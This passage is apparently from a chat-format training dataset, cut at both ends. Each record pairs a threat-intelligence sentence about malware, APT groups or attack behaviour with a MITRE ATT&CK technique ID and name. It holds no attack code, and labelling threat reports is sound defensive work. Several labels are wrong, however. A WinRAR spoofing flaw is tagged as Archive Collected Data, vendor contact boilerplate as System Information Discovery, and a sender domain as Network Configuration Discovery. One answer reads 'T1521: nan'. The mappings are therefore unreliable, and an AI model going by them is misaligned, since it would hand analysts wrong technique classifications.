techniques and ID from MITRE ATT&CK framework.,BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs ""louder"" interactions with the malware.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT has the capability to create a remote shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can capture keystrokes on a compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig can leverage API functions such as ShellExecuteA and HttpOpenRequestA in the process of downloading and executing files.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also searched a compromised DCCC computer for specific terms.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to targeting, adversaries may compromise the infrastructure of other adversaries.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has collected data and files from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process Doppelgänging is implemented in 4 steps : * Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KOMPROGO is capable of creating a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats decompresses ZIP files once on the victim machine.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used PowerShell to download and execute malware and reconnaissance scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon uses cmd.exe to execute commands for discovery.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 also executed a .dll for a first stage dropper using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create, acquire, or steal code signing materials to sign their malware or tools.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has encrypted files and information before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has been created with a hidden attribute to insure it's not visible to the victim.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has packed malware payloads before delivery to victims.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic encrypts collected data using a public key framework before sending it over the C2 channel.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto uses launchctl to enable screen sharing on the victim’s machine.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The executable version of Helminth has a module to log keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito deletes files using DeleteFileW API call.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote access tools will call back to the first-stage command and control server for instructions.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses HTTP/HTTPS for command and control communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This document was a decoy aimed to entice the user to open malicious documents embedded further down the pageThe actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim’s machine.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used LinkedIn to send spearphishing links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some InnaputRAT variants establish persistence by modifying the Registry key HKU\\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the system is powered on, it may become a target for lateral movement.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload (abbad7acd…) is an executable that appears to have been created by a VBScript to Executable tool and further obfuscated with a cryptor### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS uses encoded strings in its process kill list.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger can obtain information about the victim's IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker used PowerShell to download additional payloads and for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as ""Google Defender"" ""Google Email Protection,"" and ""Google Scanner"" for Gmail users.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can use steganography to hide C2 information in images.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GETMAIL extracts emails from archived Outlook .pst files.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The NETWIRE client has been signed by fake and invalid digital certificates.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic can retrieve files from the local file system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has decrypted the binary's configuration once the main function was launched.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has exploited multiple Windows vulnerabilities and a .NET Runtime Optimization vulnerability for privilege escalation.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Office Visual Basic for Applications macros can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use sudo to run a command.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2:   ..   To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has commands to get information about the victim's name, build, version, serial number, and memory usage.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can identify the username of the infected user.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To manage their credentials, users have to use additional credentials to access their keychain.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional information For more information about the attacks and the indicators of compromise, please contact: intelreports@kaspersky.com Alternatively, please visit: https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting To find more information about cybersecurity awareness training for enterprise or government staff, go to Kaspersky Security Awareness### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use Remote Services such as Distributed Component Object Model to facilitate remote IPC execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The last technique that was particularly interesting is the time zone check, as the Trojan will not execute its functional code if the system does not have a specific time zone set### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has been incompletely signed with revoked certificates.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of local system accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has the ability to hide the console window for its document search module from the user.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This could include filling out profile information, developing social networks, or incorporating photos.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.### Assistant: T1200: Hardware Additions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It specifically enumerates processes for Wireshark and Sysinternals.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The body of the POST request may contain files contained in the cabinet format### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used the net share command as part of network reconnaissance.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may breach or otherwise leverage organizations who have access to intended victims.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor possesses the capability to list files and directories on a machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker obfuscated shellcode used during execution.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses HTTP for C2 communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT uses Base64 encoding for C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has used several Windows functions for various purposes.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has used cmd.exe /c and batch files for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The chinapolicyanalysis.org domain was used as the sender address, as well as the hosting location of the malicious RTF document### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST had commands to enumerate files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 moved laterally via RDP.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has sent spearphishing e-mails with archive attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team used the sp_addlinkedsrvlogin command in MS-SQL to create a link between a created account and other servers in the network.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To change the operating system in memory, the adversary typically can use one of two methods.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can collect data from a local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The spear phishing emails and attached malicious macro documents typically have geopolitical themes### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda has a command to delete a file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron can be configured to exfiltrate data during nighttime or working hours.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By the end of 2017, a threat group used Invoke-PSImage to hide PowerShell commands in an image file and execute the code on a victim's system.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike Startup Items, a login hook executes as the elevated root user.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has downloaded second stage malware from compromised websites.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used FTP for exfiltration.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Installation of digital certificates may take place for a number of server types, including web servers and email servers.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSinfo: OSInfo is a general purpose, system information gathering tool### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has checked the language of the machine with function GetUserDefaultUILanguage and terminated execution if the language matches with an entry in the predefined list.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK can decode shellcode using a custom rotating XOR cipher.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can delete previously exfiltrated files from the compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used C2 infrastructure to receive exfiltrated data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used the CreateProcessA and ShellExecute API function to launch commands after being injected into a selected process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific features in web applications may be highly resource intensive.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has lured victims into executing malicious files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton modifies the tty_tickets line in the sudoers file.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let’s Encrypt SSL certificate### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has sent phishing emails with malicious links included.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar encodes communications to the C2 server in Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used reg commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has uploaded files from victim machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum has used base64 to encode C2 communication.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa added a spoofed binary to the start-up folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The plist file is installed in the ~/Library/LaunchAgents/ folder and configured with the path to the persistent binary located in the ~/Library/ folder.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities: Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has remote desktop functionality.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used ipconfig and arp to determine network configuration information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Browser bookmarks may reveal personal information about users as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has sent targeted spearphishing e-mails with malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can scan networks for open ports and listening services.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The results are Gzipped and saved under random file in the temp folder.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka encrypts some C2 traffic with the Blowfish cipher.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used RC4 encryption and AES to obfuscate HTTP traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has also used the Win32_Process class to execute a malicious DLL.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may generate these cookies in order to gain access to web resources.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs can download and launch additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses the Windows API call, CreateProcessW, to manage execution flow.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBShower has attempted to complicate forensic analysis by deleting all the files contained in %APPDATA%\..\Local\Temporary Internet Files\Content.Word and %APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 malware often uses HTTP and DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: SecureWorks) Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the Windows Component Object Model for local code execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This directory will also contain the process id of the running malware in process.id and a “build name” (as it is called by the author) in build.id### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Enumerates running processes for “Wireshark” and “Sysinternals”### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to communicate with its C2 over DNS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT gathers the victim username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: . The C2 server will provide the system specific identifier within the answer portion of the DNS response### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may set up their own Domain Name System servers that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Email attacks often use 